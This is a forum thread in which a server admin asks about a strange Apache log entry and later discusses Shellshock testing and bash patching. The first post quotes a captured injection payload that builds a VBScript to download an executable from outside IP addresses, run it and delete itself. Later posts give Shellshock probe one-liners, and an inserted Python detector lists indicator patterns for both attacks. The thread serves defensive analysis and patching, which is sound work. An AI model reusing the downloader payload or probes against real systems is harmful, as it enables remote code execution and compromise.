Lars, Senior Member
Joined: 25 Oct 2010, Posts: 136
Posted: Thu Sep 25, 2014 9:05 pm, Post subject: Strange log in apache
Hi,
Today I noticed the strangest log entry in /var/log/httpd/access_log:
Code:
"GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%28%22123.108.109.100%22%2C%22123.108.109.100%3A53%22%2C%22123.108.109.100%3A443%22%2C%22178.33.196.164%22%2C%22178.33.196.164%3A53%22%2C%22178.33.196.164%3A443%22%29%3Afor+each+Url+in+DS%3Await%3Dtrue%3Aquit%3Dfalse%3AD%28Url%29%3Aif+quit+then%3Aexit+for%3Aend+if%3Anext%3ASub+D%28Url%29%3Aif+IsObject%28xml%29%3Dfalse+then%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3Aend+if+%3Axml.Open+%22GET%22%2C%22http%3A%2F%2F%22%5E%26Url%5E%26%22%2Fgetsetup.exe%22%2CTrue%3Axml.OnReadyStateChange%3DGetRef%28%22xmlstat%22%29%3Aout%3DNow%3Axml.Send%28%29%3Awhile%28wait+and+60%5E%3Eabs%28datediff%28%22s%22%2CNow%2Cout%29%29%29%3Awscript.sleep%281000%29%3Awend%3AEnd+Sub%3Asub+xmlstat%28%29%3AIf+xml.ReadyState%5E%3C%5E%3E4+Then%3Aexit+sub%3Aend+if%3Await%3Dfalse%3Aif+xml.status%5E%3C%5E%3E200+then%3Aexit+sub%3Aend+if%3Aquit%3Dtrue%3Aon+error+resume+next%3Aset+sGet%3DCreateObject%28%22ADODB.Stream%22%29%3AsGet.Mode%3D3%3AsGet.Type%3D1%3AsGet.Open%28%29%3AsGet.Write+xml.ResponseBody%3AsGet.SaveToFile+%22ko.exe%22%2C2%3AEnd+sub%3AWshShell.run+%22ko.exe%22%2C0%2C0%3ASet+fso+%3DCreateObject%28%22Scripting.Filesystemobject%22%29+%3Afso.DeleteFile%28WScript.ScriptFullName%29+%26+cscript+22222.vbs.} HTTP/1.1" 200 2363
To me it seems like a hack attempt. What worries me is that Apache seems to have handled it as a legitimate request. In part it doesn't seem to be harmful to my SMS server, which is not built on M$ software, but I'm not certain...
I found some search results like http://security.stackexchange.com/questions/68035/is-this-new-hack-attempt-something-to-worry-about that call it an injection attack, but I couldn't validate the replies.
Have you seen anything similar? Or know what it is?
Regards
Lars
140926: Some additional information:
Also found this link: http://forums.iis.net/t/1217448.aspx?Interesting+exploit+attempt+ related to Microsoft IIS server.
A whois on the request address showed it came from China; the IPs in the command came, somewhat confusingly, from Hong Kong and the USA, Portugal and Paris.
An nmap on the request IP gave: All 1000 scanned ports on 122.228.207.244 are filtered
Tried to check what processes are running, but there are quite a few and I cannot say which of them were normally running. I could not identify anything especially suspicious though.
Finally I checked that no new files had been created (on the other hand the request ended with: "DeleteFile....").
The links I found were all from after 20th September this year.
I sent a question to my ISP and to my DNS service, which also runs a web hotel: none of them had seen anything similar or knew what the request addressed. Both suggested I contact this forum.
gerasimos_h, Site Admin
Joined: 09 Aug 2007, Posts: 1757, Location: Greece
Posted: Fri Sep 26, 2014 8:33 pm
I doubt it, as the script tries to run .exe and .vbs, which are Windows executables, and most likely the vulnerability doesn't exist anyway in our web server...
Didn't have time to examine the thread though, but I don't see it as serious...
gerasimos_h
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Lars, Senior Member
Joined: 25 Oct 2010, Posts: 136
Posted: Sat Sep 27, 2014 9:21 am
Thank you gerasimos!!
Lars
Lars, Senior Member
Joined: 25 Oct 2010, Posts: 136
Posted: Sat Sep 27, 2014 11:48 am
An additional comment:
I agree with you about the Windows-typical commands; that was also my first thought, but I wasn't sure.
But since a friend posted me about the Linux/MacOS bash bug, I ran the tests described in the link above against my server:
http://shellshock.brandonpotter.com/
http://www.shellshocktest.com/
http://bashsmash.ccsir.org/
and found that my SMS-1.6.0 server probably isn't vulnerable to the Linux bash bug.
Bash itself in SMS-1.6.0 (Slackware 13.37), however, seems to be vulnerable to the bash bug, tested with
Code:
$ env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
$ env X="() { :;} ; echo busted" `which bash` -c "echo completed"
$ env x='() { :;}; echo vulnerable' bash -c 'echo hello'
However, I never use SMS-1.6.0 as an internet client.
I also tried bash in my ordinary Slackware 14.0, and it also seems vulnerable to the bash bug.
Regards, and thank you for your comment!
Lars
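As an added example, not code from this thread or from the SMS project, here is a small Python checker for the two patterns discussed here: the URL-encoded `{.exec|cmd.exe ...}` request from the first post and the `() {` Shellshock function prefix from the bash tests above. It parses Apache access_log lines in the common/combined format, URL-decodes the request and flags the indicators; the client addresses and log lines are constructed, and it assumes the User-Agent field is logged (combined format) when looking for the Shellshock prefix.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log format; "rest" holds the optional referer and
# user-agent fields of the combined format (assumed to be logged).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)(?P<rest>.*)$'
)

# Indicator patterns. The first four come from the request quoted in this thread
# (a {.exec|...} macro that tries to spawn cmd.exe and build a VBScript downloader);
# the last is the Shellshock function-definition prefix, in case a request header
# carries it. Matching is done on URL-decoded text.
INDICATORS = (
    ("exec-macro", re.compile(r"\{\.exec\|", re.I)),
    ("cmd-exe", re.compile(r"\bcmd\.exe\b", re.I)),
    ("script-object", re.compile(r"CreateObject\(", re.I)),
    ("null-byte", re.compile(r"\x00")),
    ("shellshock-prefix", re.compile(r"\(\)\s*\{")),
)

def analyze_line(line):
    """Parse one access_log line; return the client IP, HTTP status, decoded target
    and the names of the indicators that matched, or None if the line doesn't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote_plus(m["target"])
    haystack = target + " " + unquote_plus(m["rest"])
    hits = [name for name, rx in INDICATORS if rx.search(haystack)]
    return {"ip": m["ip"], "status": int(m["status"]), "target": target, "indicators": hits}

def suspicious_requests(lines):
    """Return the analyses of the lines that hit at least one indicator."""
    return [r for r in map(analyze_line, lines) if r and r["indicators"]]

# Constructed sample log: placeholder client IPs, a benign search, a shortened
# request of the shape seen in this thread, and a Shellshock-style User-Agent.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Sep/2014:20:31:02 +0200] "GET /?search=hello+world HTTP/1.1" 200 2363',
    '198.51.100.8 - - [25/Sep/2014:20:31:09 +0200] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3Ex.vbs'
    '+Set+x%3DCreateObject%28%22Microsoft.XMLHTTP%22%29.} HTTP/1.1" 200 2363',
    '198.51.100.9 - - [25/Sep/2014:20:32:44 +0200] "GET /cgi-bin/status HTTP/1.1" 404 292 "-" "() { :;}; echo probe"',
]

if __name__ == "__main__":
    for r in suspicious_requests(SAMPLE_LOG):
        print(r["ip"], r["status"], r["indicators"])
```

Note that the status column only says what Apache served (here the index page); it does not tell you whether anything in the query string was executed, so the decoded request, not the 200, is what to look at.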
gerasimos_h, Site Admin
Joined: 09 Aug 2007, Posts: 1757, Location: Greece
Posted: Sat Sep 27, 2014 2:23 pm
All bash versions are vulnerable, so you need to update the package from SMS-Current or Slackware patches...
Nevertheless SMS and generally Slackware servers ain't vulnerable, since no shell access is granted to services, nor to user nobody...
It's a shellshock, so you need shell access....
So if you don't have a web or any other application that is too "dirty", you don't have problems...
gerasimos_h
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Lars, Senior Member
Joined: 25 Oct 2010, Posts: 136
Posted: Sat Sep 27, 2014 6:17 pm
Thank you again gerasimos for looking into it!
I'll update my bash!
Regards
Lars
Lars, Senior Member
Joined: 25 Oct 2010, Posts: 136
Posted: Sun Sep 28, 2014 7:55 pm
A final question after unrigging my vessel:
Will the bash-4.3.025-i486-2.txz from SMS-Current be compatible with the 13.37 software in S*M*S-1.6.0?
As you say, and as some searching revealed (for instance https://zinetik.com/fix-bash-failure-step-step/), there is still no bug-free version.
Perhaps I should wait till there is one?
Regards
Lars
gerasimos_h, Site Admin
Joined: 09 Aug 2007, Posts: 1757, Location: Greece
Posted: Mon Sep 29, 2014 12:30 am
Yes, it will be compatible; you can always check it on your VirtualBox first...
Also from slackware-current, available in SMS too...
Code:
a/bash-4.3.026-i486-1.txz: Upgraded.
This is essentially a rebuild as the preliminary patch for CVE-2014-7169
has been accepted by upstream and is now signed. This also bumps the
patchlevel, making it easy to tell this is the fixed version.
Possibly more changes to come, given the ongoing discussions on oss-sec.
gerasimos_h
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Lars, Senior Member
Joined: 25 Oct 2010, Posts: 136
Posted: Mon Sep 29, 2014 10:47 am
Of course gerasimos, I've got my *.ova!
I was a bit tired when I wrote last night.
I'll deal with it after the dry dockings next weekend!
Many thanks again!
Lars
gerasimos_h, Site Admin
Joined: 09 Aug 2007, Posts: 1757, Location: Greece
Posted: Fri Oct 03, 2014 6:39 am
Sure, no problem; patches applied to those packages as well...
For what it's worth, I recently upgraded a slackware-11 installation with bash from slackware-13...
gerasimos_h
Superb! Mini Server Project Manager
http://sms.it-ccs.com
Lars, Senior Member
Joined: 25 Oct 2010, Posts: 136
Posted: Fri Oct 03, 2014 11:07 am
Quote:
    For what it's worth, I recently upgraded a slackware-11 installation with bash from slackware-13...
Of course it's worth something for me, who's not so advanced or experienced!
Thank you gerasimos!
Lars